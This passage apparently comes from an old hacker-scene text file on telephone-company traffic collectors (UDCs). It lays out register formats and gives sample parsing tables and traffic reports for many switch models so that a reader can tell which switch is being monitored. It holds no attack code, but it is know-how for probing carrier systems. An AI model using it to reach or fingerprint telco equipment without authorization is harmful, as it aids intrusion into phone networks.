  14896.  
  14897. ^A      Start of Heading
  14898. ^B      Start of Text
  14899. ^C      End of Text
  14900. ^D      End of transmission
  14901. ^E      Enquiry (no not like CBI)
  14902. ^F      Acknowledgment
  14903. ^G      Bell :)
  14904. ^H      Backspace
  14905. ^I      Horizontal Tab
  14906. ^J      Line feed
  14907. ^K      Vertical Tab
  14908. ^L      Form Feed
  14909. ^M      Carriage return
  14910. ^N      Shift out
  14911. ^O      Shift in
  14912. ^P      Data line escape
  14913. ^Q      Device Control 1
  14914. ^R      Device Control 2
  14915. ^S      Device Control 3
  14916. ^T      Device Control 4
  14917. ^U      Negative Acknowledgment
  14918. ^V      Synchronous Idle
  14919. ^W      End of Transmission Block
  14920. ^X      Cancel
  14921. ^Y      End of Medium
  14922. ^Z      Substitute
  14923.  
  14924.  
  14925.  
  14926. What is all this?
  14927. ~~~~~~~~~~~~~~~~
  14928.  
  14929. The RMT data is the data transmitted to the UDC by the switch.  This data
  14930. is formatted in such a way that it tells the UDC what is happening and what
  14931. has already happened since the last buffer flip.  This data is then converted
  14932. to a standard format to be transferred to the Central Processor.  For examples
  14933. of switch output, refer to the switch example list further in this article.
  14934.  
  14935. Here is an example of the System Output data, after being translated into
  14936. standard format by the UDC:
  14937.  
  14938.  
  14939. The first two lines of the System Output data will contain the values
  14940. of the 19 status registers as follows:
  14941.  
  14942.        0     1     2     3     4     5     6     7     8     9
  14943.  
  14944. 000  00345 00003 00013 00000 00005 00000 00005 01903 00012 00000
  14945. 001  06800 01021 01101 01065 00000 00003 00007 02435 00000 00000
  14946.  
  14947.        10    11    12    13    14    15    16    17    18    19
  14948.  
  14949. The registers are as follows:
  14950.  
  14951. 0       UDC control program number (usually 345, newer versions may be diff.)
  14952. 1       UDC control program version (1,3,5,etc.)
  14953. 2       Hour at buffer flip (active to passive)
  14954. 3       Minute at buffer flip (active to passive)
  14955. 4       Number of buffer flips since power on (65535 maximum)
  14956. 5       Power interrupt flag (99 if fewer than two intervals have occurred
  14957.         since the power interrupt or hard restart; 0 otherwise)
  14958. 6       Number of reports in the buffer
  14959. 7       Total number of meters in this buffer (including headers)
  14960. 8       Hour at buffer flip (passive to active)
  14961. 9       Minute at buffer flip (passive to active)
  14962. 10-13   Strapping Card signature
  14963. 14      Total number of errors since last had reset or power up
  14964. 15      Number of soft restarts since last power-up or hard restart
  14965. 16      Number of buffer flips since last soft restart
  14966. 17      Address of last error which caused a soft restart
  14967. 18-19   unused
  14968.  
  14969.  
  14970. When a traffic report is to be sent, the following header will be sent
  14971. (in the System Output) to the UDC processor(s) to tell the traffic processor
  14972. to begin buffering the report:
  14973.  
  14974.        0     1     2     3     4     5     6     7     8     9
  14975.  
  14976. 190  65535 00008 00022 00000 00000 00000 00000 00000 00000 00000
  14977. 191  00004 00027 00078 00700 00800 31227 00074 00000 00002 00018
  14978. 192  00078 00000 00000 00000 00000 00000 00000 00000 00000 00000
  14979.  
  14980.        10    11    12    13    14    15    16    17    18    19
  14981.  
  14982. The registers for the header are as follows:
  14983.  
  14984. 0       65535 (This signals the beginning of the switch report)
  14985. 1       Message type obtained from the 'type' field of the RMT
  14986. 2       The number of registers used by the message, including the
  14987.         10 registers of this header.
  14988. 3-9     unused (00000)
  14989.  
  14990.  
  14991.  
  14992. Ok ?!  Now what?!
  14993. ~~~~~~~~~~~~~~~~~
  14994.  
  14995. Well now that I have explained all the commands, the data formats, etc,
  14996. of the UDC, you can now check the RMT or TRAFFIC buffers to see exactly
  14997. what type of switch you are monitoring.  Here are some examples of the
  14998. Data format for the following switches:
  14999.  
  15000. ************************************************************************
  15001. -------------------  AT&T AUTOPLEX 100 SWITCH  -------------------------
  15002. ************************************************************************
  15003.  
  15004.  
  15005. Example of RMT data:
  15006. ~~~~~~~~~~~~~~~~~~~
  15007.  
  15008.  
  15009. ENTRY  REQUIRED   STRING        NEW     ACTION  TYPE    STARTING      ENDING
  15010.         PHASE                   PHASE                   REGISTER      REGISTER
  15011. ------------------------------------------------------------------------------
  15012. 001     000     /M 00/          001     075     255     65535           65535
  15013. 002     001     /BLOCK C/       002     077     001     00020           00169
  15014. 003     002     /FINISH/        001     073     255     65535           65535
  15015. 004     001     /CELL 001/      001     077     002     00170           00229
  15016. 005     001     /CELL 002/      001     077     003     00230           00289
  15017. 006     001     /CELL 003/      001     077     004     00290           00349
  15018. 007     001     /CELL 005/      001     077     005     00350           00409
  15019. 008     001     /CELL 006/      001     077     006     00410           00469
  15020. 009     001     /CELL 007/      001     077     007     00470           00529
  15021. 010     001     /CELL 008/      001     077     008     00530           00589
  15022. 011     001     /CELL 009/      001     077     009     00590           00649
  15023. 012     001     /CELL 010/      001     077     010     00650           00709
  15024. 013     001     /CELL 011/      001     077     011     00710           00769
  15025. 014     001     /CELL 012/      001     077     012     00770           00829
  15026. 015     001     /CELL 013/      001     077     013     00830           00889
  15027. 016     001     /BLOCK H/       001     077     014     00890           00949
  15028. 017     001     /FINISH/        001     073     255     65535           65535
  15029.  
  15030.  
  15031. Example of TRAFFIC report:
  15032. ~~~~~~~~~~~~~~~~~~~~~~~~~
  15033.  
  15034. M 00    3/7/1993        THU     13:00:00
  15035.         #068
  15036.  
  15037.         A 30
  15038.  
  15039.         BLOCK C 000034   13:00  3/7/1993        12:00   3/7/1993
  15040.  
  15041. (0)
  15042. 000100 000313 000197 000049 000029 000103 000226 000125 000220 000066
  15043. (1)
  15044. 000180 000291 000238 000123 000050 000154 000326 000146 000074 000089
  15045. (2)
  15046. 000000 000007 000000 000000 000000 000000 000000 000000 000000 000000
  15047. (3)
  15048. 000000 000000 000000 000000 000000 000000 000000 000036 000180 000000
  15049. (4)
  15050. 000023 000023 000366 000000 000000 000000 000000 000000 000000 000000
  15051. (5)
  15052. .
  15053. .
  15054. .
  15055.   (more data)
  15056.  
  15057. .
  15058. .
  15059. (13)
  15060. 000000 000000 000000 000000 000000 000000 000000 000000 000000 000000
  15061.         FINISH
  15062.         03/07/93  13:30:38
  15063.         #371
  15064.         .
  15065.         .
  15066.         .
  15067.  
  15068. M 00    3/7/1993 THU 13:00:00
  15069.         #068
  15070.  
  15071.  
  15072. 00 REPT:AMPSTRSF        CELL 001  START 120    STOP 130     03/07   COMPLETE
  15073. 000089 000014 000000 000000 000000 000000 000084 000014 000201 000001
  15074. 000052 000050 000048 000036 000002 000008 000003 000199 000000 002654
  15075. 000000 000031 000000 000360 000000 000000 000000 000036 003728 005170
  15076. 000000 004065 003170 000000 003992 000071 000000 000067 000146 000000
  15077. 000241 000000 000000 000000 000000 000000 000000 000000 000000 000000
  15078. #077
  15079.  
  15080.         M 00 REPT:RC CENSUS
  15081.                 OFFICE RC CHANNEL = REM
  15082.                 TRCA OVER 0% FULL
  15083.                 RBA OVER 5% FULL
  15084.                 RCMDS   MODE = 0
  15085.                 #082
  15086.  
  15087.  
  15088.         M 00 REPT:RC SOURCE
  15089.  
  15090.         SCV=0
  15091.         CFV=0
  15092.         RCS=0
  15093.         DLY=0
  15094.         VSS=0
  15095.         ACS=0
  15096.         CSR=0
  15097.         BIS=0
  15098.         TRB=0
  15099.         FBP=0
  15100.         LOG=0
  15101.         CR6=0
  15102.         #083
  15103.         .
  15104.         .
  15105.         .
  15106.         (more)
  15107.         .
  15108.         .
  15109.  
  15110. *************************************************************************
  15111. ---------------------   ITT/North 1210 Switch  --------------------------
  15112. *************************************************************************
  15113.  
  15114.  
  15115.  
  15116. Example of RMT data:
  15117. ~~~~~~~~~~~~~~~~~~~
  15118.  
  15119. ACTION  IN LINE  003                    FIXED LOWER: 00000  UPPER: 02039
  15120.  
  15121. ENTRY  REQUIRED STRING          NEW     ACTION  TYPE  STARTING  ENDING
  15122.         PHASE                   PHASE                 REGISTER  REGISTER
  15123. -------------------------------------------------------------------------------
  15124. 001     000     /:/             001     076     255     65535   65535
  15125. 002     001     /TYPE/          002     073     255     65535   65535
  15126. 003     002     /2  /           003     077     002     00020   00098
  15127. 004     002     /4  /           003     077     004     00100   00319
  15128. 005     002     /5  /           003     077     005     00320   00469
  15129. 006     002     /16 /           003     077     016     00670   01769
  15130. 007     002     /18 /           003     077     018     01770   02040
  15131. 008     002     /20 /           003     077     020     00470   00669
  15132. 009     003     /END/           000     073     255     65535   65535
  15133.  
  15134. Example of a TRAFFIC report:
  15135. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  15136.  
  15137. DSS-1  VAR-00 VER-00 PAT=43   ACD
  15138. 938 R TRAFF 4703 12/06/93       09:00:00 SBG-B
  15139.                                 DATA FROM 1210 SWITCH TO UDC
  15140.  
  15141. DIAL TONE DELAY
  15142. TYPE    CODE    SCAN(SEC)       BRP     START/TIME   LENGTH(MIN) ORDER/DATE
  15143.   2      R          10          21(45)   08:00          60       12/16/93
  15144.  
  15145. THRESHOLD TIME 2.0
  15146.  
  15147. LSID    DTD  TIME(SEC)  CALLS   DELAY CALLS
  15148.  1              .34     60           1
  15149.  2              .47     34           0
  15150. SYS TOTAL       .43     94           1
  15151. END
  15152.  
  15153. 936 TRAFF  4703 12/06/93        09:45:55        SBG-B
  15154. SEPERATIONS
  15155.  
  15156. TYPE    CODE    SCAN(SEC) BRP   START/TIME      LENGTH(MIN)     ORDER/DATE
  15157.   4      R      NONE     10(43Z 12:00            60             12/06/79
  15158.  
  15159. CNTR*  VALUE  CNTR*  VALUE  CNTR*   VALUE CNTR*  VALUE  CNTR*  VALUE
  15160.   1    32      2      65     3       73    4      84     5      64
  15161.   6    42      7      84     8       51    9      63     10     69
  15162.  
  15163. END
  15164.  
  15165. 9344  TRAFF 4703  12/06/93  09:46:00    CALL COUNT
  15166. .
  15167. .
  15168. (more)
  15169. .
  15170. .
  15171.  
  15172.         note: This thing is a beast! If you find one of these call
  15173.                 a museum quick!!!
  15174.  
  15175. *************************************************************************
  15176. ---------------         ITT/North NX-1E Switch    -----------------------
  15177. *************************************************************************
  15178.  
  15179.  
  15180.  
  15181. RMT data example:
  15182. """"""""""""""""""
  15183.  
  15184.  
  15185.  
  15186. ACTION IN LINE 000                      VARIABLE LOWER: 00000 UPPER: 00019
  15187.  
  15188. ENTRY   REQUIRED        STRING  NEW     ACTION  TYPE    STARTING  ENDING
  15189.         PHASE                   PHASE                   REGISTER  REGISTER
  15190. ---------------------------------------------------------------------------
  15191.  
  15192. 001     000        /:/          001     076     255     65535     65535
  15193. 002     001        /DATA TYPE/  001     078     001     65535     65535
  15194. 003     001        /END OF/     000     073     255     65535     65535
  15195.  
  15196.  
  15197. Example of a TRAFFIC report:
  15198. """"""""""""""""""""""""""""
  15199.  
  15200. 26 JUNE 86   10:00:00    THT  735    TM GROUPED   DATA DUMP REPORT
  15201.  
  15202. TIME OF LAST REPORT:    26 JUNE 78    09:00:00
  15203.  
  15204. DATA TYPE               GROUPED DATA
  15205.  
  15206. SOTU    572     681
  15207.  
  15208. SOTP    434     863
  15209.  
  15210. RSOU    894
  15211.  
  15212. RSOP    978
  15213.  
  15214. GTCA    1       1       2       3       4       5       6
  15215.  
  15216. SLA     0       0       0       0       1       1       1
  15217.  
  15218. TKTU    631     408     17      358     951     426     324
  15219.         436     384     277     462     46      853     956
  15220.  
  15221. TKTP    543     753     783     34      572     294     815
  15222.         426     85      357     392     739     212     142
  15223.  
  15224. TK2U    584     282     53      19
  15225.  
  15226. BSWU    27      7
  15227.  
  15228. QTCU    18
  15229.  
  15230. END OF GROUPED DATA DUMP
  15231.  
  15232.  
  15233.  
  15234. ***************************************************************************
  15235. ----------- THE GTE GTD-1 (Automatic Electric No.1 EAX) Switch-------------
  15236. ***************************************************************************
  15237.  
  15238. Example of RMT data:
  15239. ~~~~~~~~~~~~~~~~~~~
  15240.  
  15241.  
  15242.  
  15243.  
  15244. ACTION IN LINE 007                      VARIABLE LOWER: 00000 UPPER: 00079
  15245.  
  15246. ENTRY   REQUIRED  STRING        NEW     ACTION  TYPE    STARTING   ENDING
  15247.         PHASE                   PHASE                   REGISTER   REGISTER
  15248. ---------------------------------------------------------------------------
  15249.  
  15250. 001     000     /HO UR/         000     075     255     65535      65535
  15251. 002     000     /MS 19/         001     077     001     00020      00039
  15252. 003     001     /MS 19/         001     081     001     00101      65535
  15253. 004     001     /COUNTS/        001     073     255     65535      65535
  15254. 005     001     /MS 21/         002     077     002     00040      00079
  15255. 006     002     /MS 21/         002     081     001     00101      65535
  15256. 007     002     /COUNTS/        003     073     255     65535      65535
  15257.  
  15258.  
  15259.  
  15260.  
  15261.  
  15262. Example of TRAFFIC report:
  15263. ~~~~~~~~~~~~~~~~~~~~~~~~~
  15264.  
  15265. I  00  HO UR  1:00:00
  15266. R  00  ME RR   9
  15267. R  00  MS 19   7 COUNTS GREATER THAN 0
  15268. R  00  MS 19   1,01   1152  1,02  1350  1,03  1194
  15269. R  00  MS 19   1,04   1378  1,05  1212  1,06  1231
  15270. R  00  MS 19   1,07   1099
  15271. R  00  MS 21   7 COUNTS GREATER THAN 0
  15272. R  00  MS 21   1,01   397  1,02  570  1,03  574
  15273. R  00  MS 21   1,04   542  1,05  682  1,06  668
  15274. R  00  MS 21   1,07   542
  15275. R  00  MS 22   7 COUNTS GREATER THAN 0
  15276.  
  15277.  
  15278. **************************************************************************
  15279. --------- THE GTE GTD-2 (Automatic Electric No.2 EAX) Switch -------------
  15280. **************************************************************************
  15281.  
  15282. Example of RMT data:
  15283. ~~~~~~~~~~~~~~~~~~~
  15284.  
  15285. ACTION IN LINE 007                      VARIABLE LOWER: 00000 UPPER: 00079
  15286.  
  15287. ENTRY  REQUIRED STRING          NEW     ACTION  TYPE   STARTING ENDING
  15288.        PHASE                    PHASE                  REGISTER REGISTER
  15289. ---------------------------------------------------------------------------
  15290. 001     000     /S@/            001     084     255     65535   65535
  15291. 002     001     /MPTK/          001     078     001     65535   65535
  15292. 003     001     /MPSW/          001     078     002     65535   65535
  15293. 004     001     /MPLB/          001     078     003     65535   65535
  15294. 005     001     /MPMA/          001     078     004     65535   65535
  15295. 006     001     /MPLS/          001     078     005     65535   65535
  15296. 007     001     /MPSP/          001     078     006     65535   65535
  15297.  
  15298.  
  15299. Example of TRAFFIC report:
  15300. ~~~~~~~~~~~~~~~~~~~~~~~~~
  15301.  
  15302. S@1900  TDA     MPTK    08-14-86        1900    2000
  15303.  
  15304.         TRK     ICT     ICT     ICT     OGT     OGT     OGT     PRE
  15305.         GRP     USAGE   ATT     HITS    USAGE   ATT     OFL     DIAL
  15306.  
  15307.         128     0       0       0       31      18      0       0
  15308.         129     0       0       0       32      12      0       0
  15309.         130     0       0       0       0       0       0       0
  15310.         131     0       0       0       486     269     0       0
  15311.         132     0       0       0       55      13      0       0
  15312.         133     317     143     0       264     108     0       0
  15313.         134     0       0       0       1       2       0       0
  15314.  
  15315. S@1901  TDA     PMSW    08-14-86        1900    2000
  15316.  
  15317.         SVC     USAGE   ATT     OFL
  15318.  
  15319.         10      3
  15320.         10      3       164     0
  15321.         11      17      163     0
  15322.         14      302     2523    0
  15323.         15      200     2391    0
  15324.         16      377     2187    0
  15325.         18      84      1171    0
  15326.         19      113     1477    0
  15327.  
  15328.  
  15329. **************************************************************************
  15330. ------------------- The Motorola EMX-250 Switch --------------------------
  15331. **************************************************************************
  15332.  
  15333.  
  15334. Example of RMT data:
  15335. ~~~~~~~~~~~~~~~~~~~
  15336.  
  15337. ACTION IN LINE 003                      VARIABLE  LOWER: 00000 UPPER: 00389
  15338.  
  15339. ENTRY  REQUIRED    STRING       NEW     ACTION  TYPE    STARTING  ENDING
  15340.         PHASE                   PHASE                   REGISTER  REGISTER
  15341. ----------------------------------------------------------------------------
  15342. 001     000        /TRA21/      001     078     001     65535     65535
  15343. 002     001        / /          002     073     255     65535     65535
  15344. 003     002        /^M/         000     078     002     65535     65535
  15345.  
  15346.  
  15347.  
  15348. Example of TRAFFIC report:
  15349. ~~~~~~~~~~~~~~~~~~~~~~~~
  15350.  
  15351. TRA21   0307    1400    1500
  15352. 0369    0000    00
  15353. 00129 00045 00178 00127 00000 00000 00000 00000
  15354. 00000 00000 00000 00001 00000 00000 00000 00000
  15355. 101 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1
  15356.  
  15357. TRA30 0307 1400 1500
  15358. 0000 0000 00
  15359. 00000 00000 00000 00000 00000 00000 00000 00000
  15360. 00000 00000 00000 00000 00000 00000 00000 00000
  15361. 247 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 2134 1
  15362.  
  15363. TRA31 0307 1400 1500
  15364. 0000 0000 00
  15365. 00000 00000 00000 00000 00000 00000 00000 00000
  15366. 00000 00000 00000 00000 00000 00000 00000 00000
  15367. 253 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1
  15368.  
  15369. TRA32 0307 1400 1500
  15370. 00000 00000 00000 00000 00000 00000 00000 00000
  15371. 00000 00000 00000 00000 00000 00000 00000 00000
  15372. 254 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1
  15373.  
  15374.  
  15375. ************************************************************************
  15376. -----------------         NEC ND-20S SWITCH      -----------------------
  15377. ************************************************************************
  15378.  
  15379.  
  15380. Example of RMT data
  15381. """""""""""""""""""
  15382.  
  15383.  
  15384.  
  15385. ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING  ENDING
  15386.         PHASE                   PHASE                   REGISTER  REGISTER
  15387. --------------------------------------------------------------------------
  15388.  
  15389. 001     000        ///          000     075     255     65535     65535
  15390. 002     000        /ORG. CALL/  001     078     001     65535     65535
  15391. 003     001        /DUMP END/   000     073     255     65535     65535
  15392. 004     000        /SPECIAL DU/ 001     078     002     65536     65535
  15393.  
  15394.  
  15395. Example of TRAFFIC report
  15396. ~~~~~~~~~~~~~~~~~~~~~~~~
  15397.  
  15398.  
  15399. 06/21   20:01   CON-TEST        NG
  15400. PL:1 0 5 4 5 4 6 PT:1 0 3 1 6 4 2
  15401. 06/21   20:02   * TRAFFIC NORMAL DUMP *
  15402.  
  15403.         COM  ORG. CALL ATTEMPTS (PEG COUNT)
  15404.  
  15405. 026613  000079  000233   00000 00000 00000 00038
  15406. 000000  000114
  15407.  
  15408.         COM  ORG. CALL COMPLETED (PEG COUNT)
  15409.  
  15410. 012172  000049  000113  000047
  15411.  
  15412.         OOH  TER. CALL COMPLETED (PEG COUNT)
  15413.  
  15414. 034146  000142  000000
  15415.  
  15416.         OOH  CALLED PARTY BUSY ENCOUNTERED   (PEG COUNT)
  15417.  
  15418. 003356
  15419.  
  15420. 06/21   20:04   *NORMAL DUMP END*
  15421.  
  15422.  
  15423. 000000 000000
  15424.  
  15425.         00H  CALLED OFFICE   (PEG COUNT)
  15426.  
  15427. 000000 000000 000000 000000 000000 000000 000000 000000
  15428.  
  15429.         OOH  A-LINK     USAGE PER NW BASIS  (CCS)
  15430.  
  15431.  
  15432. 0733.80  0594.40 0000.00 0000.00
  15433.  
  15434.         OOH  TRUNK USAGE   (CCS)  OGY
  15435.  
  15436. 0002.40  0004.20 0009.00 0001.60 0009.60 0002.20 0016.00
  15437. 0000.00  0003.00 0000.00 0000.00 0046.80 0000.00 0003.00
  15438.  
  15439. 06/21   20:22  *SPECIAL DUMP END*
  15440.  
  15441. 06/21   20:22
  15442.  
  15443.  
  15444. ***************************************************************************
  15445. ------------------ Northern Telecom DMS-10 Switch -------------------------
  15446. ***************************************************************************
  15447.  
  15448. Example of RMT data:
  15449. ~~~~~~~~~~~~~~~~~~~
  15450.  
  15451. ACTION IN LINE 011                      VARIABLE LOWER: 00000 UPPER: 00560
  15452.  
  15453. ENTRY  REQUIRED  STRING         NEW     ACTION  TYPE    STARTING  ENDING
  15454.         PHASE                   PHASE                   REGISTER  REGISTER
  15455. --------------------------------------------------------------------------
  15456. 001     000     /OPM001/        000     072     001     65535     65535
  15457. 002     000     /OPM002/        000     078     002     65535     65535
  15458. 003     000     /OPM003/        000     078     003     65535     65535
  15459. 004     000     /OPM004/        000     078     004     65535     65535
  15460. 005     000     /OPM005/        000     078     005     65535     65535
  15461. 006     000     /OPM006/        000     078     006     65535     65535
  15462. 007     000     /OPM007/        000     078     007     65535     65535
  15463. 008     000     /OPM008/        000     078     008     65535     65535
  15464. 009     000     /OPM009/        000     078     009     65535     65535
  15465. 010     000     /OPM010/        000     078     010     65535     65535
  15466. 011     000     /OPM011/        000     078     011     65535     65535
  15467. 012     000     /OPM012/        000     078     012     65535     65535
  15468. 013     000     /OPM013/        000     078     013     65535     65535
  15469.  
  15470.  
  15471. Example of TRAFFIC report
  15472. ~~~~~~~~~~~~~~~~~~~~~~~~
  15473.  
  15474. OPM001 TRAF HLST MON   08/19/86   15:00:00  HRHR
  15475.  
  15476.                 PEG     BLK     USE
  15477.         ORTM    00635   00000   00978
  15478.         OROG    00477   00000   00685
  15479.         ORNC    00089
  15480.         RVRT    00012
  15481.         INTM    00429   00000   00707
  15482.         INOG    00000   00000   00000
  15483.         INNC    00003
  15484.  
  15485. OPM002 OSVC HLST MON  11/02/85  15:00:00 HRHR
  15486.  
  15487.                 PEG
  15488.  
  15489.         PSIG    00027
  15490.         PDTO    00015
  15491.         PABN    00092
  15492.         FSTR    00168
  15493.         DGTC    00599
  15494.         DPC     00874
  15495.         TOTC    01473
  15496.                   %
  15497.         DGTS    000.0
  15498.         DPS     000.0
  15499.         TOTS    000.0
  15500.  
  15501.  
  15502. ************************************************************************
  15503. ----------------- Northern Telecom DMS-100 Switch ----------------------
  15504. ************************************************************************
  15505.  
  15506. Example of RMT data
  15507. ~~~~~~~~~~~~~~~~~~
  15508.  
  15509. ACTION IN LINE 004                      VARIABLE LOWER: 00000 UPPER: 01015
  15510.  
  15511. ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING   ENDING
  15512.         PHASE                   PHASE                   REGISTER   REGISTER
  15513. ---------------------------------------------------------------------------
  15514. 001     000        /QWMPR2/     001     075     255     65535      65535
  15515. 002     001        /SLOWS/      002     077     001     00020      00999
  15516. 003     002        /TRMT2/      003     068     066     65535      65535
  15517. 004     002        /ANN^J/      002     068     119     65535      65535
  15518. 005     002        /SITE^J/     003     073     255     65535      65535
  15519. 006     003        /TRK^J/      004     077     002     01000      04499
  15520. 007     004        /KEY/        005     081     019     00027      65535
  15521. 008     005        /QFZ^J/      000     077     003     04500      04920
  15522.  
  15523.  
  15524. Example of TRAFFIC report
  15525. ~~~~~~~~~~~~~~~~~~~~~~~~
  15526.  
  15527. CMFLINT OMPR213  AUG13  15:01:09     3684       INFO  CM  REPORT
  15528.  
  15529. CLASS: NMCTRAFF
  15530. START: 1986/08/13  14:00:00  WED; STOP: 1986/08/13   15:00:00 WED;
  15531. SLOWSAMPLES:         36;  FASTSAMPLES:          360;
  15532.  
  15533. CPU
  15534.         MTCHINT   TRAPINT   CPUFLT  SYSWINIT SYSCINIT    SYNCLOSS
  15535.         MSYLOSSU  SSYLOSSU
  15536.  0           0         0       0       0          0           0
  15537.              0         0
  15538.  
  15539. ICO
  15540.  
  15541.         IOCERR    IOCLKERR   IOCFLT   IOCLKSBU   IOLKMBU  IOCSBU
  15542.         IOCMBU
  15543.  0           0         0        0      0          0           0
  15544.              0
  15545.  
  15546. CMC
  15547.         KEY (CMC_INDEX)
  15548.         .
  15549.         .
  15550.         .
  15551.  
  15552. ***********************************************************************
  15553. ----------------- Northern Telecom DMS-250 ----------------------------
  15554. ***********************************************************************
  15555.  
  15556. Example of RMT data
  15557. ~~~~~~~~~~~~~~~~~~
  15558.  
  15559. ACTION IN LINE 003                      VARIABLE LOWER: 00000 UPPER: 02387
  15560.  
  15561. ENTRY     REQUIRED    STRING    NEW   ACTION  TYPE STARTING  ENDING
  15562.           PHASE                 PHASE              REGISTER  REGISTER
  15563. --------------------------------------------------------------------------
  15564. 001        000       /QMPR2/    001     072   255  65535     65535
  15565. 002        001       /INFO/     002     073   255  65535     65535
  15566. 003        002       /SLOWS/    000     078   001  65535     65535
  15567.  
  15568.  
  15569.  
  15570. Example of TRAFFIC data
  15571. ~~~~~~~~~~~~~~~~~~~~~~
  15572.  
  15573. QMPR18 AUG28  17:00:43 4000 INFO QM REPORT
  15574.         CLASS:SCHOURDC
  15575.         START:1984/08/28  16:00:00  TUE; STOP: 1984/08/28 17:00:00 TUE;
  15576.         SLOWSAMPLES:       36; FASTSAMPLES
  15577.  
  15578. TRMT1
  15579.         VACT    UNCA    HNPI    UNDN    BLDN    UNIN
  15580.         TESS
  15581.  
  15582.    0     60       0       0       0       0       0
  15583.           0       0       0
  15584.  
  15585. TRMT2
  15586.  
  15587.         DNTR    CNOT    DCFC    PRSC    GNCT    ATBS
  15588.                 MHLD
  15589.  
  15590.    0      0       0       0       0       0       0
  15591.           0       0
  15592.  
  15593.  
  15594. QMPR220 AUG28 17:30:16  6100 INFO REPORT
  15595.         CLASS: ADHOURC
  15596.         START:1984/08/28        17:00:00 TUE; STOP 1984/08/28   18:00:00 TUE;
  15597.         SLOWSAMPLES:    36;     FASTSAMPLES:    360;
  15598.  
  15599. TRK
  15600.         KEY (COMMON_LANGUAGE_NAME)
  15601.         INFO (QM2TRKINFO)
  15602.           INCATOT PRERTEAB   INFAIL   NATMPT MOVFLATB   GLARE
  15603.           QUTFAIL DEFLCDA    DREU     PREU   TRU        SBU
  15604.           ANSWER  INVAUTH    CONNECT  TANDEM AQF        ANF
  15605.  
  15606.  
  15607. *********************************************************************
  15608. ---------------- Northern Telecom SL-1 Switch ----------------------
  15609. *********************************************************************
  15610.  
  15611. Example of RMT data
  15612. ~~~~~~~~~~~~~~~~~~
  15613.  
  15614. ACTION IN LINE 005 (RAM)        VARIABLE LOWER: 00000 UPPER: 00010
  15615.  
  15616. ENTRY   REQUIRED   STRING       NEW     ACTION  TYPE    STARTING ENDING
  15617.         PHASE                   PHASE                   REGISTER REGISTER
  15618. -------------------------------------------------------------------------
  15619. 001     000     /TFS000/        001     073     255     65535    65535
  15620. 002     001     /19/            002     073     255     65535    65535
  15621. 003     002     / /             000     084     255     65535    65535
  15622. 004     001     /TF/            000     073     255     65535    65535
  15623. 005     002     /TF/            000     073     255     65535    65535
  15624. 006     000     /TFS001/        000     078     001     65535    65535
  15625. 007     000     /TFS002/        000     078     002     65535    65535
  15626. 008     000     /TFS411/        000     078     141     65535    65535
  15627. 009     000     /TFS412/        000     078     142     65535    65535
  15628. 010     000     /TFS999/        000     073     255     65535    65535
  15629.  
  15630.  
  15631. Example of TRAFFIC report
  15632. ~~~~~~~~~~~~~~~~~~~~~~~~
  15633.  
  15634. 001 TFS000
  15635.  
  15636. 13      10      1978
  15637. 10      30      00
  15638.  
  15639. 001 TFS102
  15640.  
  15641. 00      0000157 00100
  15642.  
  15643. 001 TFS102
  15644.  
  15645. 01      0000194 00100
  15646.  
  15647. 001 TFS102
  15648.  
  15649. 02      0000194 00100
  15650.  
  15651. .
  15652. .
  15653. .
  15654.  
  15655. 001     TFS001
  15656.  
  15657. 00      TERM    00000   0000012 00023   00000   0000157 00161
  15658. 01      TERM    00000   0000028 00018   00000   0000256 00157
  15659. 02      TERM    00000   0000015 00019   00000   0000194 00134
  15660. 06      CONF    00000   0000000 00000   00000   0000001 00003
  15661. 07      TDS     00000   0000000 00000   00000   0000000 00000
  15662.  .
  15663.  .
  15664.  .
  15665.  
  15666.  
  15667.  
  15668. ************************************************************************
  15669. ---------------- Northern Telecom SP-1 PABX Switch ---------------------
  15670. ************************************************************************
  15671.  
  15672.  
  15673. Example of RMT data
  15674. ~~~~~~~~~~~~~~~~~~
  15675.  
  15676. ACTION IN LINE 013                      VARIABLE LOWER: 00000 UPPER: 00042
  15677.  
  15678. ENTRY   REQUIRED  STRING        NEW     ACTION  TYPE    STARTING  ENDING
  15679.         PHASE                   PHASE                   REGISTER  REGISTER
  15680. --------------------------------------------------------------------------
  15681. 001     001       /JAN/         002     073     255     65535     65535
  15682. 002     001       /FEB/         002     073     255     65535     65536
  15683. 003     001       /MAR/         002     073     255     65535     65535
  15684. 004     001       /APR/         002     073     255     65535     65535
  15685. 005     001       /MAY/         002     073     255     65535     65535
  15686. 006     001       /JUN/         002     073     255     65535     65535
  15687. 007     001       /JUL/         002     073     255     65535     65535
  15688. 008     001       /AUG/         002     073     255     65535     65535
  15689. 009     001       /SEP/         002     073     255     65535     65535
  15690. 010     001       /OCT/         002     073     255     65535     65535
  15691. 011     001       /NOV/         002     073     255     65535     65535
  15692. 012     001       /DEC/         002     073     255     65535     65535
  15693. 013     002       /19/          000     075     054     65535     65535
  15694. .
  15695. .
  15696. .
  15697.  
  15698. Example of TRAFFIC report
  15699. ~~~~~~~~~~~~~~~~~~~~~~~~
  15700.  
  15701.  
  15702. 0067  OPR  MEA  00315  013077  18 - 200SUS
  15703.  
  15704. LIN#    0       78
  15705.  2      2       8       0       0       32      0       36      0     2  82
  15706.  
  15707. LIN#    1       8
  15708.  0      0       8       0       0       32      0       0       32     2  0
  15709.  
  15710.  
  15711. WED 11 SEPT     1980    112777
  15712.  
  15713. 572     415     23      3       46      160     1992    0
  15714.   0     516      0      0       22        1     2180    0
  15715.  
  15716.         0055  OPR  MEA   045331   112044
  15717.  
  15718. 2420    1713    101     10      327     628     4512    8512    0
  15719.  
  15720.  WED  11 SEPT 1980    1:06:27    1606CLS3
  15721.  
  15722.  
  15723.  .
  15724.  .
  15725.  .
  15726.  
  15727.  
  15728. ***********************************************************************
  15729. --------------- Stromberg Carlson DCO Switch (!!) ---------------------
  15730. ***********************************************************************
  15731.  
  15732. Example of RMT data
  15733. ~~~~~~~~~~~~~~~~~~
  15734.  
  15735. ACTION IN LINE 006                      VARIABLE LOWER: 00000 UPPER: 00837
  15736.  
  15737. ENTRY   REQUIRED  STRING        NEW     ACTION  TYPE    STARTING ENDING
  15738.         PHASE                   PHASE                   REGISTER REGISTER
  15739. --------------------------------------------------------------------------
